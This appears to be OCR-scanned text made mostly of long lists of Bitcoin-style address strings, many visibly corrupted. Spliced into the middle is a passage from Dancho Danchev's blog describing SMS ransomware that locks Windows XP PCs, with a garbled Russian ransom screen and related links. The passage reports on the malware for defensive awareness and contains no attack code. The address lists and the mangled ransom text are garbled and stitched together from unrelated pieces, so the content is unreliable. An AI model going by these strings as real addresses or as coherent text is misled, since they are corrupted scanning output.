1GPhzv9So]jdcVG2f982SGeBPTizv5iREB 
1GpiJWPz84DKSUvEtpsJKi8rpZ9q8UtBgP 
1Gpj9NacayHHSZXPJek1DDz1QzKGq6n4Jx 
1GPkpUvqLVs80CKuGWKCbMeCDgWNn7Bo1M 
1GpNo14uTndVnLSjqSiLdtYY3BQ7wdGSn6 
1GpPg30wppa6zm6R2njjpfn8PDryk18hW1 
1GPQ9zvCASM7CVpWGtb2eDJNqnrFVMppTm 
1GPrzmNw59gLcATrdMdxcnwleGH4mqMw/7b 
1GpSifLAVLxvEezoQztLQWYV5tsxgatM3k 
1GpswAy3quuNzYix8XdD9xK38Ai98G6WqG 
1GPTFjWogisVD92EqfxX3zYvdT3kzzGQcpr 
1GpYK4vacsEQ2buP]yY3]HMtnEFsRpneeP 
1GQ2bf60pMhFcSkUWeWf2XMQ6Sav42uSSs 
1Gq52EeywZiq8QeMminQbayAZGChHmaty8 
1Gq5nkj73mMCHwXcRpfbuPH2Vi6Q7YnBVfFf 
1Gq6NRBQcGZg6PsgJRcK7fBJMPfCv7eeb 
1Gq78Sw3vcewY7g5UaGNFoLT Xekx65XKV9 
1Gq8YLEjQT94J7Qag1lvxPpXVi71r96GVTq 
1GQaSP2WKaMuxesHNcZwLaR27bmTgkMykp 
1GqCxgZfdhUAhEihpMFRrmCvy3UAkzQtkx 
1GQDWsajMCkY3wVbnpNSRcqDcdo7AMzgZq 
1GqG66DpxJWrN3E4jbj4v8bdPAmvR75aYX 
1GQH6LuaYZZ)JiJyBe2fBSPZreVuDAPSRsf 
1GqhP9GeiZcC6NHDmNpUKdaXLmJHa2EWamR 
LGqHPZwUjnrrP1327zwpcaJqomEXuBrmNg 
1LGqiQV5NVSVRSYW2h/7sk1t5sxyzfAY7Jye 
1GQiT55mLECopnkqXqeShQHDF XsAvQBeNR 
1GQiwRiPwL68Ms1EM6J2P2etTUULAZg4Wp 
1GqJtJwMCFo] pKUZG9Rs93)]pskalV8mbQZ 
1GqJzYzb)WeFgNoVVWYxnb5xmdButvYwwQ 
1GqLy8XzyHZzWUh48m2RJRFJBIqdSukNiRq 
1GQmNUekYABNUWb/7opt79bT17aqRsjBwUz 
1Gqn69MkG1QdnoujmShEycUj2deaPtUCt4 
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1GQNkad9xvLtHoPHNGCCU8yx3u5Lz3msF4 
1GQozy7LkgjWCFkg9DqLavcM7Hjhg4MW5p 
1GQpap3fG9KTHJM2n64e2ndnGparsDtHZe 
1GqPuxdAcrZwATeY8ySPWoHdrnwWBZm16A 
1GqQaveCNeu4VLHYNJhxFVL7dBFCr4mJcV 
1GQr2HJ6FHFAKCRuUSCgZKVM8wczDF12T1T 
1GQS1d42WRAJUBZvBC4gdx8MvDktMxeDBq 
1GqsykvCdMKgWDg/7tFya9e3qnYmnQQ1imbT 
1Gqtclo2zgg4ca4UhJtsJoexfRseYiKi57 
1GQTVBHaw1ASEBPcxiytbAMvG1liUopyp9G 
1GQVxZ8BbBxatE3sK65mTDf61RNQGWWM8w 
1GQweUgXZAtzbgrT YCBveUmtmL9d8VTIRn 
1GqwfnzXKuGtav2AC6vezue8S1fJWpC5cD 
1LGqzhfWN5fY6hjgpxAq33sZP9M9P7ti57k 
1Gr3aSUgFysyixZHasjjj2YeroM7g62X8N 
1GR4D6U01UUcCBVeBEwviG2FvfwvWEHmCL 
1Gr4tzq2zatPuKLL3nCDv8dcr7K8RS6de3 
1Gr8Yyp9hpqRT1XyKRqMadHH9AYM6ZGgLW 
1GrAom2TU49vaHPqkSMWZNiyKTLZktS6gq 
1LGRAVEytNdWrEjw5wS3zHavbnjJSSBKYxJR 
1GrAzjqhFC3VAXU2X88xfzZ8LvRo7Y2arj 
1GRbhzf5NMgnCDsypPtbMzurgA8zR6vnGk 
1GrcF 1YuGJYCv3DM3URniUNCGWg6HmA3wF 
1GRCkb6aP2SWQ7d5S1ZuUGPQmcBvgQNZWSz 
1GrcP1tcY2A5EtnnDR6L7fGpFiT2ZcCSPS 
1GrE21nMkxezPd3VKjqSqUThc6AAUupWFaL 
1GRfsNJSFP8519hsjvkp5SbinEMcRM9pqe 
1GRGZiW9Uqww5Go7jmxJc28QUrU6W3aqfXxg 
1GrJeiJRN46Vu2qg9nH2eDaN5AhxvjPP4dW 
1GRJmMhDGT6TedrmdgPHWR9QDz10C2Lar9p 
1GRLtPDG8Fm9s3WmxXXcBmkm4wiYnoCaoVU 
LGRML8UzruKxZ5FVAIGExXWDU4qntGCveHE 
1GRMuB5KsLRjsdnyP7NjXohLFmpxktFWS} 
1GRnZxTUKkeLT6a2qM7deixXfks7C5LWQjV 
1GRquhZwsSFSqbDQVfZwKeDhXBL1cDrihy 
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1GrRWvrybiUvec2Y47ZACSJv7CvWCvfJ UW 
1GrTVJhyreKo36cUU05ZHZmmoQD4eaabwg 
1GRVgKx8xrNMjLE1j6eCz2kKk17FZANgXF 
1GRY8xJvbhxXJ7vqUAk2NcAiWXS2nRBjze 
1GRybUurUWGJiTq403cSkDiMvf27J1SJWg 
1GS1zsWxz6w8Yt3kLMA1VY9cYrhtT54KP 
1Gs6Qnqd3Ly7tvGG8svNU9dm8p7uDoEVNV 
1GsbCQmLGh99dARad59TkpEULKwtdXhRE 
1GSBvVH8BmuonP80xxVpaD2JESFjowGrhUA 
1GSCcJTJULCv8ujGXlavpRPfaqJKtiqvVuT 
1GScutZzoHy6iGPC5WHqWkbjTUgXibXPfV 
1GSDGk15yCzvVjtLVK50pDqKaqJzpQvUFyq 
1GSdn37wm62XiuQk4Lh3uBLs5D9vpYtVNY 
1GSdpL4aTUXrApdEJ19UZdPB7SCAKC3TAt 
1Gsei9H7gpniUkY9w1ARFr2JU53a9PGV29 
1GSeyTgEdYc5npenqudPlqUZtu54YYkc8Q 
1GsGfXFaKLD2yFwSgV5zvk7sfhZAz8SiCC 
1GsGMUseys900SS7mieio3eAQGoF3MVruw 
1GShighGEQwDs6hVdbfMLRVAf|tCrsgC29 
1GSjCZ1QoUJNiyViIGHPPhYJ1oNsxRuh3tE 
1GskYwJB6oPSgBtKv1JS9gugW1TmkZHSDN 
1GsmUgXhaaP1XwZVUWE6tB3pbd2RJfpjtyZ 
1GSmMYS9mmaEhjrN2K619WDN9F9ECW3HMW1 
1GSndHnTT3JepeZ9PjGgcYgmXwG96KtDsU 
1GsqqRPp2ungStLpSav8s9UWYyjMqGXzCE 
1GsRDiqZQAowBb2NHW5kKUBJZNrkH7DiSJ8 
1GSsRr9rTgrNo5ZbtdBmdsnoypKxcFhpum 
1GStqpekmPNKUpHTAjNsmSt4Y15qpzpBsi 
1Gstx6eBvNFGCT4uckfchu7EgmzdXRtb)jj 
1GSu33X8vEfDLNiZ5FqychvXi2o0qRsxdyB 
1GSuS6BkA3aWB2DYSWe6GiILrgqEnjm2GvtMj 
1GsvhtX1r6UA2KGBr3ARcCK9XOWYjr7vSMZ 
1GSVm1LiVCjkn1tzBVQxdJTKfqs]7bSerKa 
1GsW7thFWMaL8TaEhRfvqGBGHovyBhkgxK 
1GSzTGX8iIRDfFUKMQGQnP7BVzicEzC5sBg3 
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TOPUH KacnepcKoro nor t 
py peao HbIn “)! BIA NOC Q Teced 
mM KOMNbTepe. Bupyc Bpemen S6NOKMPOBSH, HO ero 4 WHcpPpOBaHHA 
NOCTOAHHO MBHRETCA MW OCTSHOBHTb @F0 HS DOHHbIA MOMEHT 6e3 Anporpammel He 
NPeACTABNReTCA BOSMOKHeIM. fina TOTO YTOBbI YAONMTb BPEDOHOCHbI BUPYC, HEOSxOaAWMO 
YSHOTb KOKOS HO QOHHbIA MOMEHT Y BHPYUCS GNFOpPUTM WHposGHus, ANA sToro 


Bepno, 12 AaHNDIH MOMENT BHpyC WHd>pyeTcA HMereO TaKHM CnocoGoM, No JTOey 


I J EMPy'C MONHOCTEHO YAaNeH C Bawero KoembtoTepa. HawnnTe OK, uToObi npOAOMMHT’ 
pasory. 


*Tporpanma Gnoxwpyer ece AocTYyNHHeE 
OWS, Tak Kak 6c 
BCE @atina 
* Kopo 6yaur 
Yoaanure 3 ' ; - HOBKS 


This release also includes a timer, and a message explaining that re-installing Windows 
wouldn’t change the situation in an attempt to further trick the user into sending the mess- 
sage. The release is exclusively released for Windows XP and is not Windows Vista compatible. 


Cybercriminals are known to understand the benefits of converging different successful 
and well proven tactics across different propagation/infection vectors. Now that we’ve seen 
[1]scareware with elements of ransomware, as well as [2]hijacking a browser session’s ads and 
[3]demanding ransom to remove the adult content, it’s only a matter of time to witness a micro- 
payment driven scareware campaign distributed through blackhat SEO and the usual channels. 


Related posts: 

[4]5th SMS Ransomware Variant Offered for Sale 

[5]4th SMS Ransomware Variant Offered for Sale 

[6]3rd SMS Ransomware Variant Offered for Sale 

[7]SMS Ransomware Source Code Now Offered for Sale 

[8]New ransomware locks PCs, demands premium SMS for removal 


This post has been reproduced from [9]Dancho Danchev's blog. 


. http: //blogs.zdnet .com/security/?p=3014 
. http: //www.symantec.com/connect/blogs/layers-trojanransompage 


. https: //www-secure.symantec.com/connect/blogs/browsers-and-ransoms 


BPWNEH 


. http: //ddanchev. blogspot .com/2009/07/5th-sms-ransomware-variant-offered-for.html 
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1GT3drXNB2kJ5n6HiIZ2FCuxw2VVsbV7HvP 
1Gt3EPs9nJvC438e5HSaQDoxFG6sgpXsB6 
1GT4k6JywSk69wmaMkUL8m7RbvMLyXbgAi 
1GT6dZN95dVe4oiTAe6BtHT 6cvj 7joFhdw 
1GT78FR75KCDqMvpgsaN4DWzjeMdEu8FH9 
1GT8)]vsmfKoLfHExLQaECRaJPw6FZQG43V 
1GT9cvxEFLNRemjn4xSLNWpuBGkTnA2FG 
1Gt9EvcGcUZMY6koC621EeM6bpPgKURrEz 
1GTalEeoCXWyBwZUHdggvGnL5dt5waUbsn 
1Gta9zGhflEhDiPwdB7R5TPpjJadBfMqULL 
1LGtAE5Fxz1YikytRbjdgGPSnNW6DBw3Gwn 
1GTaktSh7iHHxH1dijeHKTfex2DkJRo2if 
1GtDxilaWVGcvzpBBx2uPxXU4hPZzquh6 
1GTDXiPpdWbKMVarFM6TBzowvNdJxSvJXB 
1GtFubVZFM7ZyYKFV1JibWHj3XaLZsPc2 
1GtGxyLweqDuLUHosi6Jikn4fhNnf3pnZe 
1GTjJG3BwnnXQmMLAa5z6FRdebiFxL1ZT7R 
1GTkr)xxuCYLrvrvmGBfdDtxw9M2iLEcT9 
1GtKvBYtGhBp4WFmkKhu5MxBeZMSqy6NeS 
lgTLqFm93enK7y7ZNEyMsFmWxXhqcQR9fa 
1GtLTvT78QdWdrsayir26J1Lr3D2p3J)dWR 
1GTm9vAPhirfGFggpSpGNxDL6hLiBQoDz1 
1GTMybUJu5h6orqXSkFgHvcQug43CrktkR 
1GTo3kJ1VUQJFV2xq6ZQJbhCQKtVF629dK 
1GtorinNxNsYm7swkd4qG3FSip9iVQk2u0 
1GtqxFGGqtyp7civ9UryLgXyu5EMZKPx3g 
1GTshanuuDXm]J4ETuPrugQ8RtATQPEzZ9Ha 
1GTvV16VtKGCV4bpRVkE1la7y9QH7s3ZtGFG 
1GTW5LBF5PWxeRuX7aM8V7ERGqk7vafzPW 
1GtWzKRqYXYeNTAtYigMYg1KdE2w6ToPSo 
1Gtx88cBoR9eBDzdPVb8UKRI1UiIjKDZMyiS 
1LGTxj5VvnMDqHvGTdzyxSP2n2cGQBELZ6c 
1GTyorWmUFrxMTy8zZZkgHSA844KoAnocyy 
1GtZhNiUuQp49HysgxyvRoAt5NZMzs4Qbv 
1GTZm7BgJb2bp2uRC)7enFnXwUG4GNKXvH 
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1GU1DqiSgq3tzMYpJ9NnnrdN7xAvHzqbNjC 
1GulkHcoAqyYxthug5rHPyPV7mM6EuNgUm1 
1Gu2CZgYycxwnUrECawyFbtKUJ54j3a08e 
1GU7Nb5puwQeTrWw9f9AZ1Q2QCpsu2Yc2T 
1GU8F82NPFgP6wWE9yuBrzG4o0Ag7dN9iPve 
1GU8pJDLW6Gi2vCiIG7NgmziJEqAAgqF6GQa 
1GuaN5C7S3FPxyDetabkKAWWN2ESHCXGEZy 
1GuBCnhUZ4kv76DL8e4YoGnUb4fK5QBhvy 
LGUCNYyS2ih8UsGdLxL7E8rM3dwE6RCYtC 
1LGUDFW3W3SS6G9u2930gobsVis5MXyAwAs 
1GueyMSN9YJé6égivtzn53DWckzHvCQphJmel 
1GugBKvw7Rmo3vcKGiHdVoLERajfaTkBGg 
1GuhceW9o0KJJeXMXmGFs5evNHYthdxhKmT 
1Guiumf7jX11Ri8V7wms5YRo8AGMZz5r6py 
1GuJhefURGZKdpwU3Le71Eb9gr3ca6iHjY 
1GUK9Z9Y7K3CgX1MazuAXRa5esUn6RQarf 
1GUL398uXfCA27BW2pDwy4ac8WyaNJswxP 
1GuMJafouVgyDezZ5es61VBYq Tw8fFEkva 
1GuMjHnyQZu4gBWafWavPboulJyPwxXK47K 
1GUpDpMuPrWc1NKVbSnYcQoBukphqwqkMF 
1GUPe3BdjUqDttdtulgrnN2EzbDVSQ9oxp 
1GurfqkGKbJzrhJELBXbNZFHB81CswHn9y 
1GUrGC8bN3jys3RCw5iPQoWovgNcDwDLSE 
1GuSsahJDr17Ndivfz2U0oU5MW8mxjdTBen 
1GuvBABJyiARZh5XPXukuxLi5Z9EpgSVS} 
1GuW3EpX8bE8nw7rhXfGHpFmZak4jzaVfw 
1LGV2EyVhq94zLiqXhDFKyJqf5so476iCFs 
1Gv5wz36nZcoH|CGym2n16zqpJ|W6FomPBd 
1GV8AKM4ryYCrQDt7ujfogUwUmrtju84cDp 
lgVayPvKmpzp61wxtu4zgfK8NqWNQYSNm 
1GVbmiA8dYcz51lufkKUMBKMMUA2iqw6émYLg 
1GvCtAueJMW2ubUfmDMUx2VnSoLbMLkYhh 
1GVDboCoQSXqfqM7QYeHSxaCAzTZQa591T 
1Gvdk7QqGAovk21TZZdNCHa9hecwibRFsi 
1GVezHXijAfpqMdkTea5gFVHm1ArUJhaUY 
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1GvgQzzP7ASFCND5BRjdfgh6zDFzajWhzM 
1GVHQvcYDYTVvU4DtaPKubxWNfMueL34uR 
1GvMpsc4MysK8nj8jSrPRRWDkKTRr7Yn74e 
1GvmVVv7nZzbN8o0sPDs96f9M4aeszt3aV1 
1GVmYDPmyY8nVkgahhEXeBWGqQVuC2n6a74 
1GvNngkcptT46TxkuzleAyMJJSzzQeCjhe 
1GvnuewnhSé6éuAgcr4rYqujf63xXD9jCi2wK 
1GVonTwLw2HxtcdPCLIApACQcDpjLk8PZ6 
1GVrMcS9aBA2HpvwMCSEwCfThiRwQirAah 
1GVrzuLcgr5Ztsxk4i4xgu7VtqvgNx]pQc 
1GVSLKEBNo7XdmLgkaiXvgpXfNHMexNSK6 
1GvSmuRjU9bxSyFYCUMUHPvLazwuUMXjRT 
1GVsUkc9GcnpXFFbDPfzMuTq6DyZa5cj4p 
1GVvViuKaFGXVeqyCNyRSjU7NH4Bsmt6Sp 
1GvYfozt24QbUe37CvovwiVXaneybAD8cY 
1GVyi5EGpzTjBXb9YVAgjp59GZS2SjBsTA 
1GvYygauALMFiCsL9DhsdX3VZQnjK2tejW 
1Gw5XyVwbsnHaaM43p6moq6AZog59uM24V 
1Gw6BkovoPLnyrzMKCC30dBCASjfYZYL8E 
1GW8Fd8hw3e7XmC5A7JvuNilrgkSaFadF} 
1GW8FkMoChMheunyh1V4zy2a9z6gXWijvj2 
LGW8BifNJVVK1Xzaq6KZJRKT9VpaSeufgpZ 
1LGW80UErDF]7QJzpDfwSnHaoBM7Q7hvBrd 
LGWBpAzmHzkiUZZJEMPPHqKMx4h7sByyi3 
1GWbWy42cHKAStuymMHQ23HdYjYmasSHjc 
1Gwcq4woR22mvmNNDZik5X12yny8GCqv1lw 
1LGwEq2eYNtqxnixevXFVqGvvAgRB4axA32 
1GWGm67wpRM5qCXTwMbuFXKS8VMNMGJRfd 
1GwGYPaMaG28yQDuKrQB6N527EZHwnEw8sV 
1GwhshWQovecMM5uCGcLFJRM6YpWXCZx9H 
1GWJ5JwMi9FDtSbReiPh3paCXwyY3ihFRpM 
1GWjzkqgSxfRtMMcipEkvipsKCtQ5ktXF7 
1GwKRGeon8FsFsDhEvi396WmBZAFc85DnT 
L1GwpTUxkY4a9Kiwzfz2QG5xyY1lgLyHCD2s 
LGwPuDXVE1SN9bQbeQ1lvmBhwoNE 1ldpzai2 
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1GWq3WXDaACw4RzZ9H9pSftsHv4XNbVuYX6 
1Gwq9cucDDVZiAf9NXF1kbZFQd1fZDMJSZ 
1GWaqiCvwEr2FemTLndzxFq3BJ1QLxD5ZvU 
1GwRMGzPdKmaLmwB2Gy8mm6YFAMvjrDnBs 
1GWSXqRN/74rShXRg2vqoM TeuD2VugNUKE} 
1GWU3go0H8s2JaAs6TtTMaTR3r3TKsUbckz 
LGWunyYx1fxf5hNzdLD7AHJjMcJ2ganXSfw 
LGWVqcWF5K9cA1lwbmgkrhtuiAhWiLzUgaa 
LGWWQ5sFNnw45KW2NZdtPh4pj5eD1S1Uur 
1GWxoR4xmfs4Di5x3m9W4vhSws5]JLuxpNF 
1GWxXbZ5Dy7hkhbsVKuBKDp8UJ4yEigiSd 
1GwY8k1lhmks8EvzJ17rHqu4eWubs8Y6WFZ 
1GWyCxNVFBHY1L5N2HGNeWJGTFFdxfKLU2n 
1LGwyU9DZGgn)JxkroKB8PNxMLFSVobFG6As 
1GWzT7485XZynWhPweCgCphe5WezATxdMF 
1GX8A1mKGSDG6aPJdncMQjYHUqNAKt6YKh 
1GX8SwoWGaPTw4czhjg5ocmKcTW72HmayA 
1GX9AHjZZTgh6eTHv7A18wfCwgiJFATN4L 
1GX9LWzKPp5SHTPezgk7QsjJpxePHAznqH 
lgxahCkWwYcNiclYKHKarBKMcqCe9gn7K 
1GxbbY3BXZRM7ZWPgx350P02VSq1PP3fNQ 
1GXDU6TCmw690WRWZL8BLWIAX4vpxkLzE8N 
1GXf37QBgzfo4paTPFpN5K5SfnorVvP8F8n 
1GXJEEU7RUofcT2euDqZDgGcvBsfw85vkw 
1Gxk7aj8GFUeyruMmPnLZXjhgH6HhnjJNbb 
LGXMPZy9sQPGgzuqjj8a4 7 MZYAC4THS9ax 
1GXMT15AQXsgr2fHEqkUVitU6vR6SxucQd 
1GxNaDxilbikjzpgQxzaHCBnzXRQNtriTt 
1GXNCLujYPofsF9SLCNRd7N744dY0381Sc 
1GxoHG82atVm8ot2ypqnalhqbYVNFjhKip 
1GxQrGWVDBe5RC6dzQZCqzs2KhFbd67UuL 
1GXrAGJjXtvMbueZDAaQVkulpnL7yHzewg 
1GXRdmHpRMTdsUieB2GhNbTcPQ2acPTIcGq 
1GXSsadnFLy1MdKbHw2xXf6Hufr3MAXweGg 
1GXTgP1lmV4yccuHBjhKZtCqpvtgXPi9ZUY 
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1GXU46siVZ9AWfkGaXPsPgynB32e88gnCy 
1GxuirUXmqaorHaWogr8ZJRiINUiADDufPhs 
1GXuTPS1RyDBBpjmUbcVNWMhsZGhot6A6k 
1GxvCXPm78kzk3LHaYaW3FGj6e4uyCotHT 
1GxvRXGPWqcXnJ8xboTmMNQeETb5miWyEj5 
1GXVVUV43ik9P7aZRDgpA7zRt5w1DARZko 
1GxX6pMKVY1xkN9PDpGxuMZs5uJZaixXpZo 
1Gxy8ArgjAXBfdD3VutfhB5JEgGbpgNP6E 
1GxyYRRQQEXWVEqxsNVFBmYsq4Sf¥m7xa7 
1GXZwZS7E6SxMijLVwLqamPTfvHjxitcoq 
1GY1r3AiGW5RPXeGoKZvGu7Rjc4of77VGU 
1GY212pWrTBeMLVZG47HKQ9p2dN2psDqcA 
1Gy2Ld7c1l1lHiySFNj4xgPWgpPZj72uCChp 
1GY2ZSQN33EUdSx5GYosFFNoz5Xmiakun4 
1Gy39qDQRKM8tHueo5zgZupmPFj THHe7RZ 
1GY48SbkHNDiYD9AX]frkjJcSKu3VmbyKnw 
1Gy780XpD76XTfbTGX1Edqzwsv7FzsVXwj 
1GyAXYLBu6zppe6wDW2fsgLHP31vNp326R 
1Gybf1NkH8ejYXcSbkAjrSrxoKBkE5XZmS 
1GybFi134My7higfUv2VBSQ3KHLQysmZwq 
1GyCPc8flvSesC]9xfpedfuLTtWQbHiggV 
1GyFe3DaNLD2RjrRmV1JejkKN3koBU6Xyki 
1GyFitqUKGQUQFHVNXJSjvROW8ZPSM12ZDf 
1GYgfcD1fFb7nsF6ktZpGEaLrnfrsq4dwn 
1GygtBdUAftgvoBFDeRdb7UQCkA4jVLCuW 
1GyibbL6EwiGZis17G6NBqWcqccrTLY26C 
1GYQFHYaSu1TXzZRn6ZQmMMMb7sHs4AtMkSD 
1GYqH1fbVoUTnHs8mk1CPcDB5Zw3NoYEZ2 
1GYRJpAmMPZLKTZRdQAgGs214ZB3Fp4S71 
1GysviLKfcxpodQmtPJcwlopZMqCJCJSkT 
1LGYSZkKXVkPOAZ89Q8tp52uxAfyUAIURXP] 
1GytFBpkXKqPAh7JPr9LbD94rfehQqm8oC 
LGYURTbqcnF9H3fvu7PgD3yopQWWA1GGQA 
1GYUryWgRAWurdZk9j1L18KNkKTuzUjQeF 
1GyvQu8jNkGiAV5QcxKNjpLufGh7Vget7p 
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1GyW]bcxjcPBXxaPNoBcUQP4sgd5KDj6KY 
1Gyxdo9zCGiA2FvU3KhMVN9nhDtW43So5W 
1GYyCqDbyKyy7VvrL2quiVLUV4FMTxeUid 
1GYzfgPTEivUbfzC5Q8ZgFeM9FNFF3jjsS 
1GYZJXUUWNTLvKz43HeuYNCahfhLFRC72W 
1GZ3RraqripmpbW7xC80sEUQNAtRv33N6 
1GzZ4Bd8mBGmc52n1RL1qrrax2Xe66e6j9h 
1Gz69sf96ayJBVpiZV]gan8ZM97NkapcRy 
1GZ6A8mMNespEWMsnqwAQdTmW3uQzKPdcPy 
1Gz6Hze8XRxNpV2X9EUxfxGo8bhKzd5Zu2 
1GZa22a52SWd6ofd2gAn3c3yYhEr1Hr8B8 
1GzDc7xLN62FatfsNpzDWHKo3LbbQ3XZP3 
1GZDdKnHMSzFag4VKna6cZLMUz5SEdqMJ3 
1GzdMu8iCTtegiaYUsLfykKEA98kadr8BkKii 
1GzDnWmTobpMfK8GEmkbwA4UZJYSDGY9Mf 
1GzZDNxd6yUDk82GfHKikzj T9MLwWQavFtkF 
1GZdoSDAe4ExhkVZLFRqf7WFbyFZVRQMYV 
1GZE4MUR2qmcWc5yr2GUsm1YaNcRTm5A9a 
1GZENiyoUGiBx1EB5UesDpqRsMJQgkLLu 
1GZHThCYhnpSBuihtYvXU6wjUgRnJmikx8 
LGZHZCJgqgLV5tgRFck2QePVWGLEFfPD7gg 
1GzhZNmfxH8vLoZveMzVPmGaNjDmEhLVpm 
1GzjCpzzCYEsB9cwyaNY9dC89Bw9LM Twbz 
1GZJD1AyiZ7g3Kg2dwgT8yGyF vf] YnwHL5 
1GZJeBTrrpbLGGdFCdUSAL5A7yYQAYcM5 
1GZK6A2anTrPiHiUwJjKF GtKwYyaGnjfxx 
1GZkRwKmFNv9fVdeedHvUa7bF31GEuNtuR 
1GZLYPxbgWxQaMFVTVUFBB6KxdQi4FBLoG 
1GznViEH4ZDv11Guk1EkqEvUeMUfvtG7u7 
1GZqVGmJgpdLo6VgY 7fBNGZUgE91b3TwYD 
1GzWyYnTrBEwtyaeYTPP6mgqYY43BmMKBmfV 
1GZYeJuJd LHOWWYj|GNmwGjmpvwpEuHHEHM 
1Gzyem61JUMPXHnScbUKkqI1zTtiSvTaJnC 
1GzYHdo61vCEtKUXhDDV28U7fHUptfuoH5 
1GZzF9svwwtoC92NGmLvHjUAzZLg5bBRmjJ 
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LH15HdjU7VsQLEEdRkCigM41nATbwA9VSe 
1H15me8qEjAgBCPzZZFbb5iR9SXUPR45CP7 
1LH1bZvXkchaJlJetPtirh8PnzZEsfTBZLZ4 
LHIDMFFYz3yBbZY21ZqwWuyiA8N4LhGARH 
1H1le6KBvNax5qBdBKANYdiUXdS3Rn8eU3L 
LH1LEbSKHhQUKYD5E9KGESVQgn4VUzr9fEN 
LHlecNyjF7QfobmAW82Eu7Hgsqz9JsKedLV 
LH1g5bk6jnYwYc5fbutDDgQP24mYP9HYU4 
LH1gYBA3G2sLj3chHBwc5rZ4wkjLTucatG 
LH1h3tp16d9xL9tzp5RTC5QSuKPoDxNSph 
1LH1i3HGq56UK9YobBaqfCPiIUVZCOMUNqUY} 
1H1i4hq8xksDqkgjncX896AkGaLdEcwgLU 
LHIJjJENYfMtRMNcy1KJ8EMRxcaTgzEYsxB 
1LH1Kb7hhJsWVv8hgRJBFQ9X3myqLxds2Tr 
LH1LKNPPX61RhWwb1xFCaTJ4RxdNwZbxDtA 
LH1nBmEigWRLEQzxhGdHT2PZiFITFTKQQv 
1LH1tcxfdjMQu2polAMQhnQekKTf78yz6dqD 
LH1U8pU4yj1NupmyEmRmoCBUHetN3S95bU 
1H1XjSkhvpmXiSyaDLdwZFkToiZEAWcFyY 
1LH22ULoeNwtpsCo6C7JJQVM6EKQnShySWP 
LH26DBsawvNqo6pU8GThcd7Y6wtuQHoM]J3 
LH29pdVJXzsx5 76qQdUyWPA3Q5xT21gjJi 
LH2aUHX56HMtDSNM53Ty3NwJ5JlqkpKXVE 
LH2c30payGNRzav1luFA9FVvpx4XRrkTWyF 
LH2CH3F1hoXXkjcHzxmKaJeMuLoXSAZf8Z 
LH2d5ukKm7Lv5huaDurtX3qdEEZEgvnFgPk 
LH2EVEboUeSDF4xzdwRnhckmap3jaHy8CY 
LH2FEI42UZHWWNVHBGbDtq3znkoSAjYbbS 
LH2M8BDpALhNi2KD9vC4fv4Z3dg59sk5nD 
LH2PV7wW815dPcueucjw4YxKUApiw2wWyb 
LH2rvLTArfMTNSWK7U4tNqvN9V5K5cDZaF 
LH2UF6q4TGBRPA4qqej6yz3MX4NiupGd6L 
LH2VbpviNqw1WfpfUTssa9nDTpumtaptTuk 
LH2wbPK1KagYAqvkj4vcPnssNEbuWvyKLN 
LH2woRg1JBpKuVXrjK9nUU5niu8ufAHVrm 
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LH2wrgYHnaP3VMAho6z20uE8ZAxCuWwkHX5 
LH2xvkemErDSxSXz9r5hMexUBLpc5p1rMx 
1LH35AZkszC3xcMVfZwwZcbM4AToAEo4gBH 
Lh35nRFGmgnz4gzYjmb7bTHefhKoRopwb 
LH3AZtvfjf54fGsXQsDaqsbDgU2ZvHLakx 
LH3cXgDY4MgVkzYzSv3AsNwedKsidKhc5u 
LH3QFFfdfBoxrKWebYwo8piwSRHwqzEmcN 
LH3sXZtRybLpHVdPBstjMevbP3mmgBApZz 
LH3yyRA8SujxQPjulUg2V46sGVYTMaQEHS 
LH4adwkraYgAF3TGy6qw62TrBEmK7TavJB 
Lh4g3fbLjFqhpoPAJL4a5wzc7cYezwAng 
LH4hvqfRUNQSwDUQp7uNCyez43eY56V6Ez 
LH4pqR7xWYRHVGA7WKAdkPQLoW8ak9zEuV 
1LH4svneSxiwgnDeiM5NtM2yK3tcxNJH4Xx 
LH4tMpwRxqngZtCrBcDAKNGCDJXd4EF1bt 
LH4vffaBpVVviHbFUNaVbyr9Rb7UYtnuzc 
LH52KqFY9EgYGcLHhbPwj6uM1WZXsdTpjo 
1H5548nPVp1M5Yg6xfvudAvfSa5dKprQmX 
1H5cu844eAgwS2aAY5TLptz7qy82uCWtLg 
LH5CWHVdAJCVwbMHvfc9shYLc8tJ/Eu7 DCw 
LH5dbit7ZQ32Q9ts1RKHLIAjKbcnJXMnUX 
LH5FQUoAATruBhmkYsb5fxZ85GfvEA7WzZ] 
LH5FrbRELr9SY1DdTyvUjF7dY8uJssqiA2 
LH5gvsngnkeFxaxFlbVgaq4dluUwmmwfbg 
1H5Na459VsSg73sLq66TmmbPBzZiJGLg8x 
LH5NCucJEav4noPnDjyMxJvDP6SbaMEyis 
Lh5Nx6jA4aLdj2Qn8NydX7bCAxi3HQkSU 
LH5pmshQeR4vf4mKVddUUZSHXEjtV4NcSR 
1LH5q9c68fEW5vDBcrAdAi4dt3166DekmG7 
LH5QarabRU1le9hXUVVU5QZE8jMsTpiPHgP 
LH5qUhs12nfxGFVop2FHwjZBpNy9sZBb2A 
1LH5VoZDveBHUK1YkZC6MUcEjV4DnLVFNCH 
1H64z6corkHcyheKauRuF 30dgttaSAk1lo 
LH684QHLG1kR86WmVfLMkSOR5T8wdjuF6c 
LH6AnHUajayMLZxVtK7BeQT2KYUbBuPYbE 
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1LH6bx14w3302ysh8ci6AMXBWK7XW4QqKND 
LH6CqHNzZWLgsLvFiQr9vgm9S9CKH6EAPPm9 
1LH6J9iuyP7CY6bDSg3GKDJKkZ6xAMxac24 
LH6M3jqQalFyKohPmGTFhFdZtNdjrkmLjt 
1H60pg7DxgDGU8vRDKWG5CvCuE2QNZw6A3 
LH6PAj4PhpTmmbLqZS9usJQYNpEqobwCMYN 
LH6UkqgEZ6fy2SSjxVFEruUdmkR16GksVamy 
1LH6vjol1QuvCykzDkPflwZDaqyhjJB4g4fHDx 
LH6VXpabopw84US5pDzn7HKSLnNYZPITHNn 
LH6xYAf5zz8TfUejSakWV7SAt7DKLVJPsg 
LH6YRMHjan7B1x1yEfVeKdVjLYPajkZiRg 
LH6ZN4px56JWzZZ1VnRH3cmS5kxfhobMr8j 
1H71JR41eJjHbi2ZAk3g9VNWsTaEWEIEf6K 
1H75F6Ydp7D9EvgX8AyFv9AZWWS3RHg2aU 
LH7dwK3VCK6RqoRc7PmcZDiiEFKJboxsxXr 
1H7DyamohPDXTrKWAiFibavscAHbozmNff 
LH7GMiqVPLDyK1Tqkz5VpFFheNb9ahKev2 
LH7Gph98tLQz7qRfkmalbDnW1DyNiiEzbx 
LH7hcGxKgqedXKDCNvVVWT9i3fZzPEFGLkyWa 
LH7JeYQHdKypKt2afFf4phoeWyykeaTDqo 
